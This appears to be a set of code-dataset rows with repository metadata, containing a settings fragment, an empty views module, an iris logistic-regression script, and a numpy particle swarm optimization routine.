METADATA_DEFAULT_DATA_CENTER = ["SPI"]
METADATA_DEFAULT_IDN_NODE = ["AMD", "SOOS"]
METADATA_DEFAULT_CITATION_PUBLISHER = "SPI"
DATE_TWO_DAYS = datetime.datetime(2017, 2, 5)
try:
from local_settings import *
print('Imported local_settings')
except ImportError:
pass
| 779 | 0 | 23 |
37da04a97535250d818772393ad249af4c7febea | 70 | py | Python | views/__init__.py | bkosciow/piader | 81ca2c8a4bd4a834fb460b5306fca0c5ce0584c4 | [
"MIT"
] | null | null | null | views/__init__.py | bkosciow/piader | 81ca2c8a4bd4a834fb460b5306fca0c5ce0584c4 | [
"MIT"
] | null | null | null | views/__init__.py | bkosciow/piader | 81ca2c8a4bd4a834fb460b5306fca0c5ce0584c4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
""" Views
"""
__author__ = 'Bartosz Kościów'
| 11.666667 | 30 | 0.557143 | # -*- coding: utf-8 -*-
""" Views
"""
__author__ = 'Bartosz Kościów'
| 0 | 0 | 0 |
7655b0892a69e9fd5d785d3cebb5a5bf32252527 | 886 | py | Python | IRIS- Logistic Regression.py | aayushi-droid/KNN-Machine-Learning-Algorithm | 5bd71c1a3c53decf497c7c76eaa556eecfacf29c | [
"MIT"
] | null | null | null | IRIS- Logistic Regression.py | aayushi-droid/KNN-Machine-Learning-Algorithm | 5bd71c1a3c53decf497c7c76eaa556eecfacf29c | [
"MIT"
] | null | null | null | IRIS- Logistic Regression.py | aayushi-droid/KNN-Machine-Learning-Algorithm | 5bd71c1a3c53decf497c7c76eaa556eecfacf29c | [
"MIT"
] | null | null | null | import pandas as pd
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import accuracy_score
from sklearn.linear_model import LogisticRegression
# Load The Data Into DataFrame with Pandas
iris = load_iris()
X = pd.DataFrame(iris.data) # Independent Variable
y = pd.DataFrame(iris.target) # Dependent Variable
#print(X.head()) # print 5 rows of independent variable
#Label Encoder
encode = LabelEncoder()
y = encode.fit_transform(y)
# convert into train and test data
trainX,testX,trainy, testy = train_test_split(X, y, test_size= 0.2)
# fit and predict model
model = LogisticRegression().fit(trainX,trainy)
predy = model.predict(testX)
# check accuracy score
score = accuracy_score(testy, predy)
print(f'Accuracy Score : {score}')
| 29.533333 | 68 | 0.755079 | import pandas as pd
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import accuracy_score
from sklearn.linear_model import LogisticRegression
# Load The Data Into DataFrame with Pandas
iris = load_iris()
X = pd.DataFrame(iris.data) # Independent Variable
y = pd.DataFrame(iris.target) # Dependent Variable
#print(X.head()) # print 5 rows of independent variable
#Label Encoder
encode = LabelEncoder()
y = encode.fit_transform(y)
# convert into train and test data
trainX,testX,trainy, testy = train_test_split(X, y, test_size= 0.2)
# fit and predict model
model = LogisticRegression().fit(trainX,trainy)
predy = model.predict(testX)
# check accuracy score
score = accuracy_score(testy, predy)
print(f'Accuracy Score : {score}')
| 0 | 0 | 0 |
649428646af304c32b3dae64d4cf321c4cf12be2 | 4,140 | py | Python | nonlinear_data_fitting/particle_swam_optimization_algorithm.py | almostdutch/numerical-optimization-algorithms | cd6c1306cb04eccce62a74420323bda83058c1d6 | [
"MIT"
] | null | null | null | nonlinear_data_fitting/particle_swam_optimization_algorithm.py | almostdutch/numerical-optimization-algorithms | cd6c1306cb04eccce62a74420323bda83058c1d6 | [
"MIT"
] | 1 | 2021-06-02T10:07:26.000Z | 2021-06-03T10:23:46.000Z | nonlinear_data_fitting/particle_swam_optimization_algorithm.py | almostdutch/numerical-optimization-algorithms | cd6c1306cb04eccce62a74420323bda83058c1d6 | [
"MIT"
] | null | null | null | """
particle_swam_optimization_algorithm.py
Returns the minimizer of the function
func_ps - anonimous function (vectorized for multiple particles)
"""
import numpy as np
import numpy.matlib
np.random.seed();
| 42.244898 | 135 | 0.624638 | """
particle_swam_optimization_algorithm.py
Returns the minimizer of the function
func_ps - anonimous function (vectorized for multiple particles)
"""
import numpy as np
import numpy.matlib
np.random.seed();
def particle_swam_optimization_algorithm(func_ps, options):
report = {};
N_ps = options['N_ps']; # number of particles
N_iter_max = options['N_iter_max'];
tolerance_x = options['tolerance_x'];
tolerance_y = options['tolerance_y'];
X_lower = options['x_lower'].T;
ps_X_lower = np.matlib.repmat(X_lower, N_ps, 1);
X_upper = options['x_upper'].T;
ps_X_upper = np.matlib.repmat(X_upper, N_ps, 1);
d_lower = options['d_lower'];
d_upper = options['d_upper'];
X0 = X_lower + (X_upper - X_lower) * np.random.rand(N_ps, X_lower.size); # initial positions of all particles
d = d_lower + (d_upper - d_lower) * np.random.rand(N_ps, X_lower.size); # initial directions (aka velocities) of all particles
alpha = options['alpha']; # step size
w = options['w'];
c1 = options['c1'];
c2 = options['c2'];
progress_x_ps = np.zeros((N_iter_max + 1, N_ps, X_lower.size)); # vector of positions of all particles
progress_y_ps = np.zeros((N_iter_max + 1, N_ps, 1));
progress_x = np.zeros((N_iter_max + 1, X_lower.size)); # vector of global best positions
progress_y = np.zeros((N_iter_max + 1, 1));
ps_X_best = np.zeros((N_ps, X_lower.size)); # local best positions of all particles
ps_Y_best = np.zeros((N_ps, 1));
X_best = np.zeros((1, X_lower.size)); # global best position of all particles
progress_x_ps[0] = X0;
progress_y_ps[0] = func_ps(X0);
ps_X_best = progress_x_ps[0];
ps_Y_best = progress_y_ps[0];
indx_min = np.argmin(ps_Y_best, axis = 0);
X_best = ps_X_best[indx_min];
progress_x[0] = ps_X_best[indx_min];
progress_y[0] = ps_Y_best[indx_min];
X_old = ps_X_best;
for iter_no in range(1, N_iter_max + 1):
d = w * d + c1 * np.random.rand(N_ps, 1) * (ps_X_best - X_old) + c2 * np.random.rand(N_ps, 1) * (X_best - X_old);
# Projection onto constrained parameter space
d[d < d_lower] = d_lower;
d[d > d_upper] = d_upper;
alpha *= 0.99; # to speed up convergence
X = X_old + alpha * d;
# Projection onto constrained parameter space
indx_limits = (X < ps_X_lower);
X[indx_limits] = ps_X_lower[indx_limits];
indx_limits = (X > ps_X_upper);
X[indx_limits] = ps_X_upper[indx_limits];
progress_x_ps[iter_no] = X;
progress_y_ps[iter_no] = func_ps(X);
indx_update = (progress_y_ps[iter_no] < ps_Y_best).ravel();
ps_X_best[indx_update] = progress_x_ps[iter_no][indx_update]; # updating local best positions
ps_Y_best[indx_update] = progress_y_ps[iter_no][indx_update];
indx_min = np.argmin(ps_Y_best, axis = 0);
X_best = ps_X_best[indx_min]; # updating global best position
progress_x[iter_no] = ps_X_best[indx_min];
progress_y[iter_no] = ps_Y_best[indx_min];
if (np.linalg.norm(progress_x[iter_no].reshape(X_lower.size, 1) - progress_x[iter_no - 1].reshape(X_lower.size, 1), axis = 0) \
< tolerance_x * np.linalg.norm(progress_x[iter_no].reshape(X_lower.size, 1), axis = 0)):
print('Tolerance in X is reached in %d iterations, exit..' % (iter_no));
break;
if (np.abs(progress_y[iter_no] - progress_y[iter_no - 1]) < tolerance_y * np.abs(progress_y[iter_no - 1])):
print('Tolerance in Y is reached in %d iterations, exit..' % (iter_no));
break;
X_old = X_best;
X_best = X_best.T;
progress_x = progress_x.T;
progress_y = progress_y.T;
report = {'N_iter_max' : N_iter_max, 'iter_no' : iter_no, 'X0' : X0, 'X_best' : X_best, 'progress_x_ps' : progress_x_ps,
'progress_y_ps' : progress_y_ps, 'progress_x' : progress_x, 'progress_y' : progress_y};
return (X_best, report);
| 3,905 | 0 | 23 |